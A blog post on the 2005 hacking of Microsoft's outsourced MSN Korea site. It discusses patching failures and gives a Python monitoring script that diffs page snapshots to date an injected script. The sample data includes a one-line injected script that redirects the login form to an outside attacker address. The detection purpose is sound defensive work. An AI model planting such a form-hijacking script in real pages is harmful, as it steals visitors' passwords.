When outsourcing fails you

Microsoft's South Korean MSN site, which is apparently very popular (more so than the US version), is operated by a third party. According to Microsoft, that vendor did not patch the servers hosting MSN Korea, which is what allowed the malicious code to be inserted. On the technical side, the disconcerting part is that the length of time the malicious code was live is currently unknown, or at least has not been made public.

Source: CNN.com - Microsoft: MSN site hacked in South Korea - Jun 2, 2005.

Microsoft acknowledges that hackers booby-trapped its MSN Web site in South Korea to steal passwords from visitors.

More from the CNN story:

The Korean site, unlike U.S. versions, was operated by another company, which Microsoft did not identify. Microsoft's own experts and Korean police were investigating, but Microsoft believes the computers were vulnerable because operators failed to apply necessary software patches, said Sohn, an MSN director.

Security researchers noticed the suspicious programming added to the Korean site and contacted the company Tuesday. Microsoft traced the problem and removed the hacked computers within hours, Sohn said, but it doesn't yet know how long the dangerous programming was present.

I'm not bashing Microsoft here, but this case demonstrates the security implications of outsourcing: the vendor's servers went unpatched, and it was apparently not until Microsoft itself got involved that the issue was resolved, and then within hours.

The 'security researchers' mentioned may well have been outsiders trawling for security holes for the glory of discovery (the Internet's Magellans are alive and very busy). But what of the attacker trawling for the same hole in order to exploit it? He is just as likely to find it, he will not be reporting it, and the site owner is left with no independent record of when the page started serving the password-stealing code.
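One thing a site owner can do regardless of who operates the servers is keep dated snapshots of what the site actually serves and diff the scripts on each snapshot against a known-good baseline. That both catches an injected script without waiting for an outside researcher and bounds the window during which it was live, which is the figure missing from the story above. The following is an added example written for this post; it is not code from the original page, from Microsoft or from the vendor. The snapshots and the collection address 203.0.113.7 (an RFC 5737 documentation address) are constructed for illustration; in practice the snapshots would be fetched on a schedule from the outsourced site and stored with their timestamps.

```python
import hashlib
from html.parser import HTMLParser

# Constructed sample data: a known-good front page and the same page with an
# inline script that redirects the login form to an attacker-controlled host.
BASELINE = (
    "<html><head><script src='/js/site.js'></script></head>"
    "<body><form action='/login'>...</form></body></html>"
)
INJECTED = BASELINE.replace(
    "</body>",
    "<script>document.forms[0].action='http://203.0.113.7/c';</script></body>",
)

# Constructed hourly snapshots (timestamp, html) as a monitoring job would store them.
SNAPSHOTS = [
    ("2005-05-30T00:00Z", BASELINE),
    ("2005-05-30T01:00Z", BASELINE),
    ("2005-05-30T02:00Z", INJECTED),
    ("2005-05-30T03:00Z", INJECTED),
]


class ScriptExtractor(HTMLParser):
    """Collect every script on a page: external src values and inline bodies."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(("src", src))
            else:
                self._in_script = True

    def handle_data(self, data):
        # Inside <script>...</script> HTMLParser hands us the raw body as data.
        if self._in_script and data.strip():
            self.scripts.append(("inline", data.strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def script_index(html):
    """Map a content hash to each script so that one injected tag stands out."""
    parser = ScriptExtractor()
    parser.feed(html)
    return {
        hashlib.sha256(f"{kind}:{body}".encode()).hexdigest(): (kind, body)
        for kind, body in parser.scripts
    }


def find_compromise_window(snapshots, baseline_html):
    """Walk dated snapshots in order and return (last_good, first_bad, added).

    last_good is the latest snapshot whose scripts all appear in the baseline,
    first_bad is the first snapshot carrying a script the baseline lacks, and
    added lists those new scripts. Together they bound how long the injected
    code was live. first_bad is None if no snapshot deviates.
    """
    known = script_index(baseline_html)
    last_good = None
    for timestamp, html in snapshots:
        current = script_index(html)
        added = [current[h] for h in current if h not in known]
        if added:
            return last_good, timestamp, added
        last_good = timestamp
    return last_good, None, []


if __name__ == "__main__":
    good, bad, new_scripts = find_compromise_window(SNAPSHOTS, BASELINE)
    print(f"last known good: {good}")
    print(f"first known bad: {bad}")
    for kind, body in new_scripts:
        print(f"  new {kind} script: {body}")
```

Comparing per-script hashes rather than a hash of the whole page keeps legitimate content changes (news headlines, ads) from drowning out the one change that matters, and the returned window is only as tight as the snapshot interval, so the job should run often enough that the answer to "how long was it there?" is hours, not weeks.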